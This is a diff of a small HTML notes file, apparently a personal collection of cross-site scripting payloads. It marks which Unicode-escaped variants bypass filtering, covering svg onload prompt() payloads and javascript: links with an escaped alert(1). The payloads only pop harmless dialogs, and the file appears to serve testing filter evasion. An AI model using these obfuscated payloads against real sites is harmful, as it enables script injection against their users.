--- a/Encoding Obfuscate/unicodeXSS.html
+++ b/Encoding Obfuscate/unicodeXSS.html
@@ -1,11 +1,8 @@
 <!-- Work -->
-<!-- <script>\u0061\u006c\u0065\u0072\u0074(1)</script> -->
+<!-- <svg onload=prompt()></svg>
+<svg onload=\u0070\u0072\u006f\u006d\u0070\u0074()></svg> -->
 
-<!-- Not work -->
-<!-- <script>\u000000000000000000000000000000000061\u006c\u0065\u0072\u0074(1)</script> -->
 
 <!-- Work -->
 <!-- <a href="javascript:\u0061\u006c\u0065\u0072\u0074(1)">Click me</a> -->
-
-
 <a href="javascript:\u{00000000000000000000061}\u006c\u0065\u0072\u0074(1)">Click me</a>
